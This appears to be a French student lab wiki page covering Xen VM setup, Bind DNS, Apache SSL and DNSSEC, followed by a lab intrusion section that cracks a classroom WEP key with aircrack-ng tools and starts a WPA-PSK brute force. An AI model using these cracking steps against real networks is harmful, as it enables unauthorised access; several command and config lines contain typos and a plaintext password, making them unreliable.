|
|
Ligne 2 : |
Ligne 2 : |
| Notre objectif est de créer une machine virtuelle sur l'hyperviseur capbreton.plil.fr. | | Notre objectif est de créer une machine virtuelle sur l'hyperviseur capbreton.plil.fr. |
| | | |
| + | {| class="wikitable" |
| + | ! Groupe !! VLAN !! Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM |
| + | |- |
| | | |
| Nous commencons par créer une image pour notre machine virtuelle. | | Nous commencons par créer une image pour notre machine virtuelle. |
Notre objectif est de créer une machine virtuelle sur l'hyperviseur capbreton.plil.fr.
Groupe |
VLAN |
Réseau IPv4 |
Réseau IPv6 |
@IPv4 virtuelle |
IPv4/IPv6 6509E (E304) |
IPv4/IPv6 C9200 (E306) |
IPv4/IPv6 ISR4331 |
SSID |
VM
|
Nous commencons par créer une image pour notre machine virtuelle.
$ xen-create-image --hostname=RinceCochon --ip=193.48.57.186 --gateway=193.48.57.187 --netmask=255.255.255.224 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye
Nous créons ensuite deux volumes logiques pour faire en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l’hôte
$ lvcreate -L 5G -n RinceCochon0 storage
$ lvcreate -L 5G -n RinceCochon1 storage
$ mkfs.ext4 /dev/storage/RinceCochon0
$ mkfs.ext4 /dev/storage/RinceCochon1
$ xl create -c /etc/xen/RinceCochon.cfg
$ /dev/xvda3 /home ext4 defaults 0 2
$ /dev/xvda4 /var ext4 defaults 0 2
Quitter la vm : ctrl + ]
Entrer dans la vm :
$ xen console RinceCochon
Services Internet
Connexions
$ ssh root@193.48.57.183 -p 1359
DNS : tournecochon.site
Serveur DNS
Configuration Bind
apt-get install bind9
Ajout GlueRecords ns1.tournecochon.site | 193.48.57.183
Certificat ssl
On génère une clé publique et privé dans le dossier /etc/ssl/
$ openssl req -nodes -newkey rsa:2048 -sha256 -keyout tournecochon.site.key -out tournecochon.site.csr
Nous plaçons ensuite la clé privé dans /etc/ssl/private/
Nous faisons une demande de signature de certificat sur gandi.net
On place le certificats signé et le certificat intermédiaire généré par gandi dans /etc/ssl/certs/
Sécurisation de site web par certificat
Activation du module SSL
a2enmod ssl
Configuration du port 443
Définition du serveur virtuel
Création du répertoire /var/www/tournecochon.site/
Sur le modèle du fichier /etc/apache2/000-default.conf nous avons créé le fichier de configuration /etc/apache2/sites-available/000-tournecochon.site-ssl.conf contenant :
<VirtualHost 193.48.57.183:443>
ServerName tournecochon.site
ServerAlias www.tournecochon.site
DocumentRoot /var/www/tournecochon.site
CustomLog /var/log/apache2/secure_access.log combined
SSSLEngine on
SSLCertificateFile /etc/ssl/certs/tournecochon.site.crt
SSSLCertificateKeyFile /etc/ssl/private/tournecochon.site.key
SSLVerifyClient None
</VirtualHost>
Activation du site :
a2ensite 000-tournecochon.site-ssl
Un accès au site en utilisant firefox nous permet de vérifier la présence du certificat.
Sécurisation de serveur DNS par DNSSEC
Activation dnssec
Dans /etc/bind/named.conf.options :
dnssec-enable yes;
Génération de la clé asymétrique de signature de clés de zone (KSK) :
dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE tournecochon.site
Génération de la clé asymétrique de la zone pour signer les enregistrements (ZSK) :
dnssec-keygen -a RSASHA1 -b 1024 -n ZONE tournecochon.site
On les renommes :
tournecochon.site-ksk.key
tournecochon.site-ksk.private
tournecochon.site-zsk.key
tournecochon.site-zsk.private
On inclue les clés dans /etc/bind/db.tournecochon.site
$include /etc/bind/tournecochon.site-ksk.key
Package installé
$ apt-get install ssh
$ apt-get install apache2
$ apt-get install bind9
Tests d'intrusion
Nous essayons dans cette partie de casser les clés de point d'accès wifi à l'aide d'un PC (truite) et d'un clé wifi.
Cassage de clef WEP d’un point d’accès Wifi
On récupère le nom de l'interface de la clé
$ airmon-ng
On écoute les paquets dans l'air afin d'identifier le channel de la clé correspondant à notre groupe: cracotte08.
On démarre l'interface en mode moniteur sur le channel 4
$ airmoon-ng start wlx40a5ef0f679b 4
On effectue les tests d'injection sur la clé WEP
$ aireplay-ng -9 -e cracotte08 -a 04:DA:DC:9C:50:58 wlx40a5ef0f679b
Association interface réseau avec le point d'accès cracotte08 (false authentification)
$ aireplay-ng -1 0 -e cracotte08 -a 04:DA:DC:9C:50:58 -h 40:A5:EF:01:3A:78 wlx40a5ef0f679b
La clé peut ensuite être décpté à l'aide des fichier output*.cap créé
$ aircrack_ng _b 04:DA:D2:9C:50:57 output*.cap
KEY FOUND! [ 55:55:55:55:5A:BC:09:CB:A4:44:44:44:44 ]
Decrypted correctly: 100%
Cassage de mot de passe WPA-PSK par force brute
On récupère le nom de l'interface de la clé
$ airmon-ng
On écoute les paquets dans l'air afin d'identifier le channel de la clé correspondant à notre groupe: kracotte08.
SSID:kracotte08 CH:4 BSSID: 44:AD:D9:5F:87:07
Intrusion sur un serveur d'application web
Fichier:Intrusion honey.zip
(mot de passe habituel)